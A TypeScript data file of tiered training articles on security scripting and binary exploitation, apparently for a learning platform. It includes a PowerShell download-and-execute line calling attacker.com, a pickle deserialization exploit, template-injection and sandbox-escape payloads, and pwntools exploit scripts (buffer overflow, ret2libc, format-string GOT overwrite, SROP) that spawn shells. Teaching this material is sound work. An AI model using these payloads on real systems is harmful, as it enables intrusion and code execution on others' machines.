import type { SeedArticle } from "./types";

export const SCRIPTING_BINEXP_ARTICLES: SeedArticle[] = [
  // ── scripting L0-L5 ─────────────────────────────────────────────────────
  {
    competencyId: "scripting", depthTier: 0, title: "Scripting for Security", recommendedLevel: 0,
    sections: [
      { heading: "Why scripting matters in cybersecurity", content: `Scripting transforms a security practitioner from a tool user into a tool builder. The ability to automate repetitive tasks, parse output from security tools, and create custom exploits distinguishes an effective operator.\n\nThe three primary scripting languages in security:\n- **Python**: The lingua franca — exploit development, tool building, automation, CTF solving\n- **Bash**: System administration, one-liners, piping tool output, rapid enumeration\n- **PowerShell**: Windows post-exploitation, Active Directory interaction, living-off-the-land`, sortOrder: 0 },
      { heading: "Key vocabulary", content: `- **Shebang** (\`#!/usr/bin/env python3\`): Tells the OS which interpreter to use\n- **REPL**: Read-Eval-Print Loop — interactive interpreter for testing\n- **Stdin/stdout/stderr**: Standard I/O streams, fundamental for piping\n- **Exit code**: 0 = success, non-zero = error\n- **Regex**: Pattern matching — essential for parsing tool output\n- **Serialization**: Converting objects to transmittable format (JSON, pickle, YAML)\n- **Socket**: Network endpoint for sending/receiving data\n- **API**: Interface for programmatic interaction with services`, sortOrder: 1 },
      { heading: "Sources", content: `- Python documentation: docs.python.org\n- Bash reference manual: gnu.org/software/bash/manual\n- PowerShell documentation: learn.microsoft.com/en-us/powershell`, sortOrder: 2 },
    ],
  },
  {
    competencyId: "scripting", depthTier: 1, title: "Scripting Basics", recommendedLevel: 1,
    sections: [
      { heading: "Python essentials for security", content: `\`\`\`python\n#!/usr/bin/env python3\nimport sys\nimport os\nimport subprocess\nimport requests\n\n# File operations\nwith open("/etc/passwd") as f:\n    for line in f:\n        user = line.split(":")[0]\n        uid = line.split(":")[2]\n        if int(uid) == 0:\n            print(f"Root user: {user}")\n\n# Run system commands\nresult = subprocess.run(["nmap", "-sn", "192.168.1.0/24"],\n                        capture_output=True, text=True)\nfor line in result.stdout.splitlines():\n    if "Nmap scan report" in line:\n        print(line.split()[-1])\n\n# HTTP requests\nresp = requests.get("http://target.com/api/users")\nif resp.status_code == 200:\n    data = resp.json()\n    for user in data:\n        print(f"{user['username']}: {user['email']}")\n\n# Argument parsing\nif len(sys.argv) < 2:\n    print(f"Usage: {sys.argv[0]} <target>")\n    sys.exit(1)\ntarget = sys.argv[1]\n\`\`\``, sortOrder: 0 },
      { heading: "Bash one-liners", content: `\`\`\`bash\n# Ping sweep\nfor i in $(seq 1 254); do\n  ping -c1 -W1 192.168.1.$i &>/dev/null && echo "192.168.1.$i is up"\ndone\n\n# Extract IPs from a file\ngrep -oP '\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}' access.log | sort -u\n\n# Quick port check\nfor port in 21 22 80 443 8080; do\n  (echo >/dev/tcp/target.com/$port) 2>/dev/null && echo "Port $port open"\ndone\n\n# Process nmap XML output\nxmlstarlet sel -t -m "//port[@protocol='tcp']/state[@state='open']/.."\\\n  -v "@portid" -o " " -v "service/@name" -n nmap_output.xml\n\n# Find SUID binaries\nfind / -perm -4000 -type f 2>/dev/null\n\n# Base64 decode\necho "aGVsbG8=" | base64 -d\n\`\`\``, sortOrder: 1 },
      { heading: "Regular expressions", content: `Regex is essential for parsing security tool output:\n\n\`\`\`python\nimport re\n\n# Match IP addresses\nips = re.findall(r'\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}', text)\n\n# Match email addresses\nemails = re.findall(r'[\\w.+-]+@[\\w-]+\\.[\\w.]+', text)\n\n# Match URLs\nurls = re.findall(r'https?://[^\\s<>"]+', text)\n\n# Extract HTTP status codes from logs\n# 192.168.1.1 - - [01/Jan/2024:00:00:00] "GET /index.html HTTP/1.1" 200 1234\nstatus_codes = re.findall(r'" (\\d{3}) ', log_line)\n\n# Named groups\nmatch = re.search(r'(?P<ip>\\d+\\.\\d+\\.\\d+\\.\\d+).*?"(?P<method>\\w+) (?P<path>/\\S+)', line)\nif match:\n    print(f"{match.group('ip')} {match.group('method')} {match.group('path')}")\n\`\`\``, sortOrder: 2 },
      { heading: "Sources", content: `- Python re module documentation\n- Bash Hackers wiki: wiki.bash-hackers.org\n- regex101.com (interactive regex testing)`, sortOrder: 3 },
    ],
  },
  {
    competencyId: "scripting", depthTier: 2, title: "Security Scripting in Depth", recommendedLevel: 2,
    sections: [
      { heading: "Network scripting with Python", content: `\`\`\`python\nimport socket\n\n# TCP port scanner\ndef scan_port(host, port, timeout=1):\n    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n    sock.settimeout(timeout)\n    result = sock.connect_ex((host, port))\n    sock.close()\n    return result == 0\n\n# Banner grabbing\ndef grab_banner(host, port):\n    sock = socket.socket()\n    sock.settimeout(2)\n    sock.connect((host, port))\n    sock.send(b"HEAD / HTTP/1.1\\r\\nHost: target\\r\\n\\r\\n")\n    banner = sock.recv(1024).decode(errors="ignore")\n    sock.close()\n    return banner\n\n# DNS resolution\nimport dns.resolver\nfor qtype in ["A", "AAAA", "MX", "NS", "TXT"]:\n    try:\n        answers = dns.resolver.resolve("target.com", qtype)\n        for rdata in answers:\n            print(f"{qtype}: {rdata}")\n    except dns.resolver.NoAnswer:\n        pass\n\n# Concurrent scanning with ThreadPoolExecutor\nfrom concurrent.futures import ThreadPoolExecutor\nwith ThreadPoolExecutor(max_workers=100) as executor:\n    futures = {executor.submit(scan_port, host, p): p\n               for p in range(1, 1025)}\n    for future in futures:\n        if future.result():\n            print(f"Port {futures[future]} open")\n\`\`\``, sortOrder: 0 },
      { heading: "Web interaction and scraping", content: `\`\`\`python\nimport requests\nfrom bs4 import BeautifulSoup\n\n# Session handling (preserves cookies)\nsession = requests.Session()\nsession.post("http://target.com/login",\n             data={"user": "admin", "pass": "admin"})\n\n# Authenticated request\nresp = session.get("http://target.com/dashboard")\n\n# Parse HTML\nsoup = BeautifulSoup(resp.text, "html.parser")\nfor link in soup.find_all("a", href=True):\n    print(link["href"])\n\n# Directory brute force\nwith open("/usr/share/wordlists/dirb/common.txt") as f:\n    for word in f:\n        url = f"http://target.com/{word.strip()}"\n        r = requests.get(url)\n        if r.status_code != 404:\n            print(f"[{r.status_code}] {url}")\n\n# Interact with APIs\nheaders = {"Authorization": "Bearer TOKEN"}\nresp = requests.get("http://target.com/api/v1/users",\n                    headers=headers)\nfor user in resp.json()["data"]:\n    print(f"ID: {user['id']}, Role: {user['role']}")\n\`\`\``, sortOrder: 1 },
      { heading: "PowerShell for Windows security", content: `\`\`\`powershell\n# System enumeration\nGet-ComputerInfo | Select-Object CsName, OsName, OsArchitecture\nGet-LocalUser | Where-Object Enabled -eq $true\nGet-Process | Sort-Object CPU -Descending | Select-Object -First 10\nGet-NetTCPConnection -State Listen\n\n# Active Directory queries (RSAT or domain-joined)\nGet-ADUser -Filter * -Properties LastLogonDate |\n  Where-Object { $_.LastLogonDate -lt (Get-Date).AddDays(-90) } |\n  Select-Object Name, LastLogonDate\n\nGet-ADGroupMember "Domain Admins" | Select-Object Name, SamAccountName\n\n# File searching\nGet-ChildItem -Path C:\\ -Recurse -Include *.txt,*.ini,*.config -ErrorAction SilentlyContinue |\n  Select-String -Pattern "password|secret|key" |\n  Select-Object Path, LineNumber, Line\n\n# Download and execute (common in post-exploitation)\nIEX (New-Object Net.WebClient).DownloadString("http://attacker.com/script.ps1")\n# Or with Invoke-WebRequest\nInvoke-WebRequest -Uri "http://attacker.com/tool.exe" -OutFile "C:\\temp\\tool.exe"\n\`\`\``, sortOrder: 2 },
      { heading: "Sources", content: `- Python socket module documentation\n- requests library: docs.python-requests.org\n- PowerShell documentation: learn.microsoft.com/en-us/powershell\n- Beautiful Soup: crummy.com/software/BeautifulSoup/bs4/doc`, sortOrder: 3 },
    ],
  },
  {
    competencyId: "scripting", depthTier: 3, title: "Advanced Security Scripting", recommendedLevel: 3,
    sections: [
      { heading: "Exploit scripting with pwntools", content: `\`\`\`python\nfrom pwn import *\n\n# Connect to a remote service\nio = remote("target.com", 1337)\n# Or local binary\nio = process("./vulnerable_binary")\n\n# Receive until prompt, then send\nio.recvuntil(b"Enter name: ")\nio.sendline(b"admin")\n\n# Craft payloads\npayload = b"A" * 64           # buffer overflow padding\npayload += p64(0xdeadbeef)     # overwrite return address (little-endian)\nio.sendline(payload)\n\n# Interact manually after exploit\nio.interactive()\n\n# Shellcode\ncontext.arch = "amd64"\nshellcode = asm(shellcraft.sh())  # /bin/sh shellcode\n\n# Format string exploit helper\npayload = fmtstr_payload(offset, {target_addr: desired_value})\n\n# ROP chain building\nelf = ELF("./binary")\nrop = ROP(elf)\nrop.call("system", [next(elf.search(b"/bin/sh"))])\n\`\`\``, sortOrder: 0 },
      { heading: "Scapy for packet crafting", content: `\`\`\`python\nfrom scapy.all import *\n\n# Craft and send packets\n# SYN scan\nans, unans = sr(IP(dst="192.168.1.1")/TCP(dport=[80,443,8080], flags="S"),\n               timeout=2, verbose=0)\nfor sent, received in ans:\n    if received.haslayer(TCP) and received[TCP].flags == 0x12:  # SYN-ACK\n        print(f"Port {sent[TCP].dport} is open")\n\n# ARP scan\nans, _ = srp(Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst="192.168.1.0/24"),\n             timeout=2, verbose=0)\nfor _, received in ans:\n    print(f"{received[ARP].psrc} -> {received[Ether].src}")\n\n# DNS query\nans = sr1(IP(dst="8.8.8.8")/UDP()/DNS(rd=1, qd=DNSQR(qname="target.com")),\n          verbose=0)\nfor i in range(ans[DNS].ancount):\n    print(ans[DNS].an[i].rdata)\n\n# Packet sniffing with filter\ndef callback(pkt):\n    if pkt.haslayer(TCP) and pkt[TCP].flags & 0x02:  # SYN\n        print(f"SYN: {pkt[IP].src}:{pkt[TCP].sport} -> {pkt[IP].dst}:{pkt[TCP].dport}")\n\nsniff(filter="tcp", prn=callback, count=100)\n\`\`\``, sortOrder: 1 },
      { heading: "Automation frameworks", content: `\`\`\`python\nimport argparse\nimport logging\nimport json\nfrom pathlib import Path\nfrom concurrent.futures import ThreadPoolExecutor, as_completed\n\n# Structured CLI tool pattern\ndef main():\n    parser = argparse.ArgumentParser(description="Network scanner")\n    parser.add_argument("target", help="Target IP or CIDR")\n    parser.add_argument("-p", "--ports", default="1-1024", help="Port range")\n    parser.add_argument("-t", "--threads", type=int, default=50)\n    parser.add_argument("-o", "--output", type=Path, help="JSON output file")\n    parser.add_argument("-v", "--verbose", action="store_true")\n    args = parser.parse_args()\n\n    logging.basicConfig(\n        level=logging.DEBUG if args.verbose else logging.INFO,\n        format="%(asctime)s [%(levelname)s] %(message)s"\n    )\n\n    results = []\n    start, end = map(int, args.ports.split("-"))\n\n    with ThreadPoolExecutor(max_workers=args.threads) as pool:\n        futures = {pool.submit(scan_port, args.target, p): p\n                   for p in range(start, end + 1)}\n        for future in as_completed(futures):\n            port = futures[future]\n            if future.result():\n                logging.info(f"Port {port} open")\n                results.append({"port": port, "state": "open"})\n\n    if args.output:\n        args.output.write_text(json.dumps(results, indent=2))\n        logging.info(f"Results saved to {args.output}")\n\nif __name__ == "__main__":\n    main()\n\`\`\``, sortOrder: 2 },
      { heading: "Sources", content: `- pwntools documentation: docs.pwntools.com\n- Scapy documentation: scapy.readthedocs.io\n- Python argparse documentation\n- OJ Reeves, "Building Penetration Testing Tools with Python"`, sortOrder: 3 },
    ],
  },
  {
    competencyId: "scripting", depthTier: 4, title: "Expert Scripting Techniques", recommendedLevel: 4,
    sections: [
      { heading: "Async programming for security tools", content: `\`\`\`python\nimport asyncio\nimport aiohttp\n\nasync def check_url(session, url):\n    try:\n        async with session.get(url, timeout=aiohttp.ClientTimeout(total=5)) as resp:\n            return url, resp.status, len(await resp.text())\n    except Exception:\n        return url, 0, 0\n\nasync def dir_brute(target, wordlist, concurrency=100):\n    sem = asyncio.Semaphore(concurrency)\n    async with aiohttp.ClientSession() as session:\n        async def limited(url):\n            async with sem:\n                return await check_url(session, url)\n\n        with open(wordlist) as f:\n            urls = [f"{target}/{line.strip()}" for line in f]\n\n        tasks = [limited(url) for url in urls]\n        for coro in asyncio.as_completed(tasks):\n            url, status, length = await coro\n            if status not in (0, 404):\n                print(f"[{status}] {url} ({length} bytes)")\n\nasyncio.run(dir_brute("http://target.com", "/usr/share/wordlists/dirb/common.txt"))\n\`\`\`\n\nAsync I/O is dramatically faster than threading for network-bound tasks — a single-threaded async scanner can test thousands of URLs per second.`, sortOrder: 0 },
      { heading: "C extensions and ctypes", content: `\`\`\`python\nimport ctypes\nimport ctypes.util\n\n# Load libc\nlibc = ctypes.CDLL(ctypes.util.find_library("c"))\n\n# Call C functions directly\n# getuid()\nuid = libc.getuid()\nprint(f"UID: {uid}")\n\n# ptrace (process tracing on Linux)\nPTRACE_ATTACH = 16\nPTRACE_DETACH = 17\nresult = libc.ptrace(PTRACE_ATTACH, target_pid, 0, 0)\n\n# Read process memory\nimport struct\ndef read_memory(pid, address, size):\n    with open(f"/proc/{pid}/mem", "rb") as f:\n        f.seek(address)\n        return f.read(size)\n\n# Interact with Windows API\nif sys.platform == "win32":\n    kernel32 = ctypes.windll.kernel32\n    handle = kernel32.OpenProcess(0x1F0FFF, False, pid)  # PROCESS_ALL_ACCESS\n    buffer = ctypes.create_string_buffer(4096)\n    bytes_read = ctypes.c_size_t()\n    kernel32.ReadProcessMemory(handle, address, buffer, 4096,\n                               ctypes.byref(bytes_read))\n\`\`\``, sortOrder: 1 },
      { heading: "Tool integration and output parsing", content: `\`\`\`python\nimport subprocess\nimport xml.etree.ElementTree as ET\nimport json\n\n# Parse nmap XML output\ndef parse_nmap_xml(xml_file):\n    tree = ET.parse(xml_file)\n    hosts = []\n    for host in tree.findall(".//host"):\n        addr = host.find("address").get("addr")\n        ports = []\n        for port in host.findall(".//port"):\n            state = port.find("state").get("state")\n            if state == "open":\n                service = port.find("service")\n                ports.append({\n                    "port": int(port.get("portid")),\n                    "protocol": port.get("protocol"),\n                    "service": service.get("name", "") if service is not None else "",\n                    "version": service.get("version", "") if service is not None else "",\n                })\n        if ports:\n            hosts.append({"ip": addr, "ports": ports})\n    return hosts\n\n# Chain tools: nmap → custom parser → nuclei\ndef auto_scan(target):\n    # Step 1: Discovery\n    subprocess.run(["nmap", "-sV", "-oX", "scan.xml", target], check=True)\n    hosts = parse_nmap_xml("scan.xml")\n\n    # Step 2: Build target list for web scanner\n    web_targets = []\n    for host in hosts:\n        for port in host["ports"]:\n            if port["service"] in ("http", "https", "http-proxy"):\n                proto = "https" if port["port"] == 443 else "http"\n                web_targets.append(f"{proto}://{host['ip']}:{port['port']}")\n\n    # Step 3: Run nuclei on web targets\n    with open("targets.txt", "w") as f:\n        f.write("\\n".join(web_targets))\n    subprocess.run(["nuclei", "-l", "targets.txt", "-o", "findings.txt"], check=True)\n\`\`\``, sortOrder: 2 },
      { heading: "Sources", content: `- aiohttp documentation: docs.aiohttp.org\n- Python ctypes documentation\n- nmap XML output format reference\n- nuclei documentation: docs.projectdiscovery.io/tools/nuclei`, sortOrder: 3 },
    ],
  },
  {
    competencyId: "scripting", depthTier: 5, title: "Scripting Internals", recommendedLevel: 5,
    sections: [
      { heading: "Python internals for security", content: `Understanding Python internals enables advanced techniques:\n\n\`\`\`python\n# Bytecode manipulation\nimport dis\nimport types\n\ndef original():\n    return "safe"\n\n# Disassemble\ndis.dis(original)  # Shows LOAD_CONST, RETURN_VALUE\n\n# Modify code object at runtime\ncode = original.__code__\nnew_code = code.replace(co_consts=(None, "modified"))\noriginal.__code__ = new_code\nprint(original())  # "modified"\n\n# Import hooks (intercept module loading)\nimport importlib.abc\nclass SpyFinder(importlib.abc.MetaPathFinder):\n    def find_module(self, fullname, path=None):\n        print(f"Import: {fullname}")\n        return None\nimport sys\nsys.meta_path.insert(0, SpyFinder())\n\n# Pickle deserialization exploit\nimport pickle\nimport os\nclass Exploit:\n    def __reduce__(self):\n        return (os.system, ("id",))\n\n# NEVER unpickle untrusted data\npayload = pickle.dumps(Exploit())\npickle.loads(payload)  # executes os.system("id")\n\`\`\``, sortOrder: 0 },
      { heading: "Compiler and interpreter exploitation", content: `Language runtime internals relevant to exploitation:\n\n**Python sandbox escapes**: Python sandboxes (like restricted environments) can often be escaped:\n\n\`\`\`python\n# Access builtins from any object\n().__class__.__bases__[0].__subclasses__()  # list all loaded classes\n# Find a class with os access\nfor i, cls in enumerate(''.__class__.__mro__[1].__subclasses__()):\n    if 'warning' in cls.__name__.lower():\n        print(i, cls)  # warnings.catch_warnings has linecache → os\n\n# Template injection (Jinja2, server-side)\n# {{ config.__class__.__init__.__globals__['os'].popen('id').read() }}\n\`\`\`\n\n**JavaScript prototype pollution**: Modifying Object.prototype affects all objects:\n\n\`\`\`javascript\n// If attacker controls a merge/extend operation:\nobj.__proto__.isAdmin = true;\n// Now every object has isAdmin === true\n\`\`\`\n\nThese attacks exploit the dynamic nature of interpreted languages — understanding the runtime is key to both attacking and defending.`, sortOrder: 1 },
      { heading: "Performance engineering for large-scale tools", content: `When scanning millions of targets, performance matters:\n\n\`\`\`python\n# Memory-efficient processing\ndef process_large_file(path):\n    with open(path) as f:\n        for line in f:  # lazy iteration, not f.readlines()\n            yield line.strip()\n\n# Use generators for pipelines\ndef extract_ips(lines):\n    for line in lines:\n        match = re.search(r'\\d+\\.\\d+\\.\\d+\\.\\d+', line)\n        if match:\n            yield match.group()\n\ndef unique(items):\n    seen = set()\n    for item in items:\n        if item not in seen:\n            seen.add(item)\n            yield item\n\n# Compose: processes entire file in ~constant memory\nlines = process_large_file("huge_log.txt")\nips = unique(extract_ips(lines))\nfor ip in ips:\n    print(ip)\n\n# Multiprocessing for CPU-bound tasks (hash cracking, analysis)\nfrom multiprocessing import Pool\ndef crack_hash(hash_val):\n    # CPU-intensive work\n    pass\n\nwith Pool() as pool:\n    results = pool.map(crack_hash, hash_list)\n\`\`\``, sortOrder: 2 },
      { heading: "Sources", content: `- CPython source code: github.com/python/cpython\n- Python Data Model documentation\n- "Python Internals" series by Eli Bendersky\n- PayloadsAllTheThings: github.com/swisskyrepo/PayloadsAllTheThings`, sortOrder: 3 },
    ],
  },

  // ── binexp L0-L5 ────────────────────────────────────────────────────────
  {
    competencyId: "binexp", depthTier: 0, title: "Binary Exploitation Overview", recommendedLevel: 0,
    sections: [
      { heading: "What is binary exploitation", content: `Binary exploitation (binexp) is the art of finding and exploiting vulnerabilities in compiled programs. Unlike web vulnerabilities (which target application logic), binexp targets how the CPU and operating system manage memory.\n\nThe goal is typically to achieve arbitrary code execution — making the program run attacker-controlled instructions. This is one of the most technically demanding areas of cybersecurity but also one of the most rewarding.`, sortOrder: 0 },
      { heading: "Why it matters", content: `- **CTF competitions**: Pwn challenges are among the highest-valued\n- **Vulnerability research**: Finding bugs in OS kernels, browsers, firmware\n- **Malware analysis**: Understanding how exploits work to detect and prevent them\n- **Embedded/IoT security**: Firmware often lacks modern protections\n- **Foundational knowledge**: Memory corruption is at the root of many CVEs`, sortOrder: 1 },
      { heading: "Key vocabulary", content: `- **Buffer overflow**: Writing past a buffer's boundary, corrupting adjacent memory\n- **Stack**: LIFO memory region for local variables and function return addresses\n- **Heap**: Dynamic memory allocation region (malloc/free)\n- **Shellcode**: Injected machine code, typically spawns a shell\n- **ROP (Return-Oriented Programming)**: Chaining existing code snippets ("gadgets")\n- **ASLR**: Address Space Layout Randomization — randomizes memory addresses\n- **NX/DEP**: Non-executable stack — prevents shellcode execution on the stack\n- **Canary**: Random value on the stack that detects buffer overflows\n- **PIE**: Position-Independent Executable — code loaded at random addresses\n- **GOT/PLT**: Global Offset Table / Procedure Linkage Table — used for dynamic linking`, sortOrder: 2 },
      { heading: "Sources", content: `- LiveOverflow YouTube channel\n- nightmare: guyinatuxedo.github.io (binary exploitation course)\n- pwn.college (ASU binary exploitation course)`, sortOrder: 3 },
    ],
  },
  {
    competencyId: "binexp", depthTier: 1, title: "Binary Exploitation Basics", recommendedLevel: 1,
    sections: [
      { heading: "x86-64 assembly essentials", content: `\`\`\`nasm\n; Registers (64-bit)\n; rax, rbx, rcx, rdx — general purpose\n; rsi, rdi — source/destination (function args 2, 1)\n; rsp — stack pointer (top of stack)\n; rbp — base pointer (stack frame base)\n; rip — instruction pointer (next instruction)\n\n; System V AMD64 calling convention (Linux)\n; Arguments: rdi, rsi, rdx, rcx, r8, r9 (then stack)\n; Return value: rax\n; Caller-saved: rax, rcx, rdx, rsi, rdi, r8-r11\n; Callee-saved: rbx, rbp, r12-r15\n\n; Common instructions\nmov rax, rbx      ; rax = rbx\npush rax           ; push rax onto stack, rsp -= 8\npop rbx            ; pop into rbx, rsp += 8\ncall func          ; push rip, jump to func\nret                ; pop rip (return)\nlea rax, [rbp-0x20] ; load address, not value\ncmp rax, 0         ; compare\njne label          ; jump if not equal\nsyscall            ; invoke system call\n\`\`\``, sortOrder: 0 },
      { heading: "Stack buffer overflow", content: `The classic vulnerability:\n\n\`\`\`c\n#include <stdio.h>\nvoid vulnerable() {\n    char buffer[64];\n    gets(buffer);  // No bounds checking — reads until newline\n    // Stack layout (high → low):\n    // [return address] [saved rbp] [buffer (64 bytes)]\n    // Overflow buffer → overwrite saved rbp → overwrite return address\n}\n\nvoid win() {\n    system("/bin/sh");\n}\n\nint main() {\n    vulnerable();\n    return 0;\n}\n\`\`\`\n\n\`\`\`python\nfrom pwn import *\n\nio = process("./vuln")\n\n# Find offset to return address\n# cyclic(100) generates a pattern; cyclic_find() finds the offset\n# Or: gdb → run → input cyclic pattern → check RSP value\noffset = 72  # 64 (buffer) + 8 (saved rbp)\n\nelf = ELF("./vuln")\npayload = b"A" * offset\npayload += p64(elf.symbols["win"])  # overwrite return address with win()\n\nio.sendline(payload)\nio.interactive()  # should get a shell\n\`\`\``, sortOrder: 1 },
      { heading: "Using GDB for debugging", content: `\`\`\`bash\n# Start with GDB + pwndbg (or GEF/peda)\ngdb ./binary\n\n# Essential commands\nb main              # breakpoint at main\nb *0x401234         # breakpoint at address\nr                   # run\nr < input.txt       # run with input from file\nni                  # next instruction (step over)\nsi                  # step instruction (step into)\nc                   # continue\n\n# Examine memory\nx/20wx $rsp         # 20 words (4 bytes) at stack pointer, hex\nx/s 0x404040        # string at address\nx/10i $rip          # 10 instructions at instruction pointer\n\n# Info\ninfo registers      # all registers\ninfo frame          # stack frame info\nvmmap               # memory mappings (pwndbg)\nchecksec            # security mitigations (pwndbg)\n\n# Pattern for finding offset\npwndbg> cyclic 100  # generate pattern\npwndbg> cyclic -l 0x61616166  # find offset of value in RSP\n\`\`\``, sortOrder: 2 },
      { heading: "Sources", content: `- guyinatuxedo.github.io/index.html (Nightmare — binary exploitation course)\n- pwn.college (ASU course)\n- pwndbg: github.com/pwndbg/pwndbg\n- GEF: github.com/hugsy/gef`, sortOrder: 3 },
    ],
  },
  {
    competencyId: "binexp", depthTier: 2, title: "Binary Exploitation in Depth", recommendedLevel: 2,
    sections: [
      { heading: "Bypassing NX with Return-Oriented Programming", content: `When the stack is non-executable (NX/DEP), you can't run shellcode directly. Instead, chain existing code snippets ("gadgets"):\n\n\`\`\`python\nfrom pwn import *\n\nelf = ELF("./binary")\nlibc = ELF("/lib/x86_64-linux-gnu/libc.so.6")\n\n# Find gadgets\n# ROPgadget --binary ./binary | grep "pop rdi"\nrop = ROP(elf)\n\n# ret2libc: call system("/bin/sh")\n# Need: pop rdi; ret gadget + address of "/bin/sh" + address of system()\npop_rdi = rop.find_gadget(["pop rdi", "ret"])[0]\nret = rop.find_gadget(["ret"])[0]  # stack alignment\n\n# If ASLR is off or we have a libc leak:\nlibc_base = leaked_addr - libc.symbols["puts"]  # calculate base\nsystem = libc_base + libc.symbols["system"]\nbin_sh = libc_base + next(libc.search(b"/bin/sh"))\n\npayload = b"A" * offset\npayload += p64(ret)       # align stack to 16 bytes (required for system)\npayload += p64(pop_rdi)   # pop next value into rdi\npayload += p64(bin_sh)    # address of "/bin/sh" string\npayload += p64(system)    # call system("/bin/sh")\n\`\`\``, sortOrder: 0 },
      { heading: "Format string vulnerabilities", content: `\`\`\`c\n#include <stdio.h>\nvoid vulnerable(char *input) {\n    printf(input);  // Should be printf("%s", input)\n    // If input = "%x %x %x" → leaks stack values\n    // If input = "%n" → writes to memory\n}\n\`\`\`\n\n\`\`\`python\nfrom pwn import *\n\n# Read from arbitrary address\n# %s reads a string from the address at that stack position\n# First, find our input on the stack:\n# Send "AAAA.%x.%x.%x.%x.%x..." and look for 0x41414141\n\nio = process("./fmtstr")\n\n# Overwrite GOT entry with format string\n# pwntools makes this easy\nelf = ELF("./fmtstr")\n\n# Write address of win() to GOT entry of exit()\npayload = fmtstr_payload(\n    offset=6,  # our input starts at stack position 6\n    writes={elf.got["exit"]: elf.symbols["win"]},\n    write_size="short"  # use %hn (2 bytes at a time)\n)\nio.sendline(payload)\n\`\`\``, sortOrder: 1 },
      { heading: "Reverse engineering basics", content: `\`\`\`bash\n# Static analysis\nfile binary\nchecksec binary  # NX, canary, PIE, RELRO\n\n# Disassembly\nobjdump -d binary | less\nobjdump -M intel -d binary  # Intel syntax\n\n# Strings\nstrings binary\nstrings -n 8 binary  # minimum length 8\n\n# Ghidra (decompiler)\n# Analyze → Auto Analysis → check all\n# Window → Decompile to see pseudo-C\n# Key shortcuts:\n# L → rename variable/function\n# T → retype variable\n# ; → add comment\n\n# radare2\nr2 binary\naaa          # analyze all\nafl          # list functions\npdf @main    # disassemble main\nVV @main     # visual graph mode\n\`\`\``, sortOrder: 2 },
      { heading: "Security mitigations summary", content: `\`\`\`\n┌──────────────┬─────────────────────────────────────┬──────────────────────────────┐\n│ Mitigation   │ What it prevents                    │ Bypass technique             │\n├──────────────┼─────────────────────────────────────┼──────────────────────────────┤\n│ NX/DEP       │ Executing code on the stack         │ ROP, ret2libc                │\n│ ASLR         │ Predictable addresses               │ Info leak, brute force       │\n│ Stack canary │ Buffer overflow detection            │ Leak canary, format string   │\n│ PIE          │ Predictable code addresses           │ Info leak (code address)     │\n│ Full RELRO   │ GOT overwrite                       │ ROP (bypass GOT entirely)    │\n│ Partial RELRO│ Nothing (GOT still writable)        │ GOT overwrite                │\n└──────────────┴─────────────────────────────────────┴──────────────────────────────┘\n\`\`\``, sortOrder: 3 },
      { heading: "Sources", content: `- ROPgadget: github.com/JonathanSalwan/ROPgadget\n- Ghidra: ghidra-sre.org\n- radare2: rada.re\n- OWASP Binary Exploitation guide`, sortOrder: 4 },
    ],
  },
  {
    competencyId: "binexp", depthTier: 3, title: "Advanced Binary Exploitation", recommendedLevel: 3,
    sections: [
      { heading: "Heap exploitation", content: `Heap vulnerabilities are more complex than stack overflows but extremely powerful:\n\n\`\`\`c\n// Use-After-Free\nchar *ptr = malloc(64);\nstrcpy(ptr, "data");\nfree(ptr);          // ptr is now dangling\n// ... later allocation reuses the same memory\nchar *new = malloc(64);  // may get the same chunk\n// ptr still points to the same memory → use ptr to corrupt new\n\n// Double Free\nchar *a = malloc(64);\nfree(a);\nfree(a);  // Same chunk freed twice → corrupts freelist\n// Next two mallocs return the same address\n\`\`\`\n\n**glibc heap internals**: malloc uses bins (fastbin, smallbin, largebin, unsortedbin, tcache) to manage freed chunks. Each has different exploitation characteristics.\n\n\`\`\`python\n# Tcache poisoning (glibc 2.26+)\n# Tcache is a per-thread cache of recently freed chunks\n# Poison the tcache linked list to get malloc to return arbitrary address\n\n# 1. Allocate and free chunk A\n# 2. Overwrite A's fd pointer (UAF or heap overflow)\n# 3. Next malloc of same size returns A\n# 4. Second malloc returns the forged address\n\`\`\``, sortOrder: 0 },
      { heading: "ASLR bypass techniques", content: `\`\`\`python\nfrom pwn import *\n\n# Technique 1: Information leak\n# Leak a libc address from GOT, then calculate base\nio = process("./binary")\nelf = ELF("./binary")\nlibc = ELF("/lib/x86_64-linux-gnu/libc.so.6")\n\n# If we can call puts(got["puts"]):\nrop = ROP(elf)\nrop.call("puts", [elf.got["puts"]])  # leak puts@libc address\nrop.call("main")  # return to main for second payload\n\nio.sendline(b"A" * offset + rop.chain())\nio.recvuntil(b"\\n")\nleaked = u64(io.recv(6).ljust(8, b"\\x00"))\nlibc.address = leaked - libc.symbols["puts"]\nlog.success(f"libc base: {hex(libc.address)}")\n\n# Now build ret2libc with known base\nrop2 = ROP(libc)\nrop2.call("system", [next(libc.search(b"/bin/sh\\x00\"))])\nio.sendline(b\"A\" * offset + rop2.chain())\nio.interactive()\n\n# Technique 2: Partial overwrite\n# ASLR randomizes full address but page offset (last 12 bits) is fixed\n# Overwriting just the last 1-2 bytes doesn't need a leak\n\n# Technique 3: Brute force (32-bit only — ~256 attempts)\n# 32-bit ASLR has low entropy, can be brute-forced\n\`\`\``, sortOrder: 1 },
      { heading: "Sigreturn-Oriented Programming (SROP)", content: `SROP abuses the signal return mechanism:\n\n\`\`\`python\nfrom pwn import *\n\n# When the kernel delivers a signal, it pushes a sigframe onto the stack\n# sigreturn restores ALL registers from this frame\n# If we control the stack, we can forge a sigframe\n\ncontext.arch = \"amd64\"\n\nframe = SigreturnFrame()\nframe.rax = 59          # sys_execve\nframe.rdi = bss_addr    # pointer to \"/bin/sh\"\nframe.rsi = 0           # argv = NULL\nframe.rdx = 0           # envp = NULL\nframe.rip = syscall_ret # address of \"syscall; ret\"\nframe.rsp = bss_addr + 0x100  # new stack\n\n# Trigger: set rax = 15 (sys_rt_sigreturn), then syscall\npayload = b\"A\" * offset\npayload += p64(pop_rax)    # pop rax; ret\npayload += p64(15)         # sys_rt_sigreturn\npayload += p64(syscall_ret)\npayload += bytes(frame)\n\`\`\`\n\nSROP is powerful because it requires minimal gadgets — just a \`syscall; ret\` and a way to control rax.`, sortOrder: 2 },
